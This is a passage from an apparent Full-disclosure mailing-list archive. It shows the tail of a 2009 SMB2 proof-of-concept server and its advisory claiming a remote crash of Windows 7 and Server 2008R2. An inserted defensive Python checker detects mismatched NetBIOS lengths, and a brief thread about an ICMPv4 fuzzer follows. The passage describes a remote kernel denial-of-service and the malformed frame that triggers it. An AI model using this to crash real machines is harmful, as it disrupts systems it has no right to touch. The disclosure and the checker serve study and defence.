        self.request.close()

launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445
launch.serve_forever()

#SDL FAILED

V. BUSINESS IMPACT
-
An attacker can remotely crash any Windows 7/Server 2008R2.


VI. SYSTEMS AFFECTED
-
Windows 7, Windows Server 2008R2

VII. SOLUTION
-
No patch available for the moment, your vendor does not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-
http://blogs.msdn.com/sdl/
http://g-laurent.blogspot.com/
http://twitter.com/g_laurent
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledged the vuln
November 11th, 2009: MSRC tried to convince me that a multi-vendor IPv6 bug shouldn't appear on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
More Remote Kernel FD @MS to come.
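The defect the PoC above rides on is a NetBIOS session length that disagrees with the SMB2 message following it. The script below is an added example for this thread, not code from the advisory or from the PoC: a framing check, in Python 3, that a gateway, IDS or client-side parser could run on an SMB2 NEGOTIATE response before handing it to the protocol layer. Field layout and constants follow [MS-SMB2] (2.2.1 for the header, 2.2.4 for the NEGOTIATE response); the sample frames are constructed for the example rather than captured, and the function names are this example's own.

```python
"""Check that an SMB2 response is consistently framed before parsing it.

Added example for this thread, not code from the advisory or its PoC.
Direct-TCP (port 445) framing: 1-byte type, 3-byte big-endian length,
then the SMB2 message. Sample bytes below are constructed, not captured.
"""
import struct

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_HEADER_LEN = 64              # StructureSize of every SMB2 header
SMB2_NEGOTIATE = 0x0000           # Command value of NEGOTIATE
SMB2_NEGOTIATE_RESP_LEN = 64      # fixed part of the NEGOTIATE response
SMB2_FLAGS_SERVER_TO_REDIR = 0x1  # Flags bit set on every response


def parse_netbios_session(frame):
    """Split a port-445 frame into (type, declared length, SMB2 payload)."""
    if len(frame) < 4:
        raise ValueError("frame shorter than the 4-byte NetBIOS session header")
    return frame[0], int.from_bytes(frame[1:4], "big"), frame[4:]


def check_smb2_response(frame):
    """Return a list of framing problems; an empty list means the frame is
    internally consistent. Each check only reads bytes an earlier check
    has already shown to be present, so a short frame never causes an
    out-of-range read here."""
    problems = []
    msg_type, declared_len, payload = parse_netbios_session(frame)
    if msg_type != 0x00:
        problems.append("NetBIOS message type 0x%02x is not a session message" % msg_type)
    if declared_len != len(payload):
        problems.append("NetBIOS length %d does not match the %d payload bytes present"
                        % (declared_len, len(payload)))
    if len(payload) < SMB2_HEADER_LEN:
        problems.append("payload too short for the 64-byte SMB2 header")
        return problems
    proto, struct_size, _charge, _status, command, _credits, flags = \
        struct.unpack_from("<4sHHIHHI", payload, 0)
    if proto != SMB2_PROTOCOL_ID:
        problems.append("ProtocolId %r is not SMB2" % proto)
    if struct_size != SMB2_HEADER_LEN:
        problems.append("header StructureSize %d != 64" % struct_size)
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        problems.append("SERVER_TO_REDIR flag clear on a response")
    if command == SMB2_NEGOTIATE:
        if len(payload) < SMB2_HEADER_LEN + SMB2_NEGOTIATE_RESP_LEN:
            problems.append("payload too short for a NEGOTIATE response")
            return problems
        (resp_size,) = struct.unpack_from("<H", payload, SMB2_HEADER_LEN)
        # SecurityBufferOffset/Length sit 56 bytes into the response body;
        # the offset is counted from the start of the SMB2 header.
        sec_off, sec_len = struct.unpack_from("<HH", payload, SMB2_HEADER_LEN + 56)
        if resp_size != 65:
            problems.append("NEGOTIATE response StructureSize %d != 65" % resp_size)
        if sec_off + sec_len > len(payload):
            problems.append("security buffer [%d, %d) runs past the %d payload bytes"
                            % (sec_off, sec_off + sec_len, len(payload)))
    return problems


def build_negotiate_response(declared_len=None):
    """Construct a minimal SMB 2.0.2 NEGOTIATE response (sample data).
    Pass declared_len to write a NetBIOS length that disagrees with the
    payload, which is the shape of the malformed frame in the PoC."""
    security_blob = b"\x60\x06\x06\x04\x2b\x06\x01\x05"  # placeholder blob, opaque to this check
    header = struct.pack("<4sHHIHHIIQIIQ16s",
                         SMB2_PROTOCOL_ID, SMB2_HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, 1, 0x0202, 0, b"\x00" * 16, 1,
                       0x10000, 0x10000, 0x10000, 0, 0,
                       SMB2_HEADER_LEN + SMB2_NEGOTIATE_RESP_LEN, len(security_blob), 0)
    payload = header + body + security_blob
    if declared_len is None:
        declared_len = len(payload)
    return b"\x00" + declared_len.to_bytes(3, "big") + payload


if __name__ == "__main__":
    good = build_negotiate_response()
    payload_len = len(good) - 4
    short = build_negotiate_response(declared_len=payload_len - 4)  # 4 bytes short, like the PoC
    print("well-formed:", check_smb2_response(good) or "ok")
    print("length short by 4:", check_smb2_response(short))
```

The check is deliberately strict in one direction only: a declared length that differs from the bytes on the wire is reported whether it is shorter or longer, because either way a parser that trusts the field will read past, or stop short of, the real message.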

[Full-disclosure] ICMPv4/IP fuzzer prototype.

2009-11-22 Thread laurent gaffie
Should be kweel for UTesting
http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html

Enjoy.

[Full-disclosure] Fwd: ICMPv4/IP fuzzer prototype.

2009-11-22 Thread laurent gaffie
Hell no
 random.randrang -> randrange(_) rtfm.

and yeah, you're welcome.


2009/11/23 Andrew Farmer 

On 22 Nov 2009, at 19:48, laurent gaffie wrote:
> > Should be kweel for UTesting
> >
> http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html
> ...
> > Don't forget it's a prototype, and I ASSUME you know what you're doing, do not ask for help.
>
> You definitely have to know what you're doing to run the code, as posting
> that to Blogspot has destroyed the indentation. :)
>
> Also, random.randrange(...) is going to give you much better performance
> than random.choice(range(...)). Just sayin'.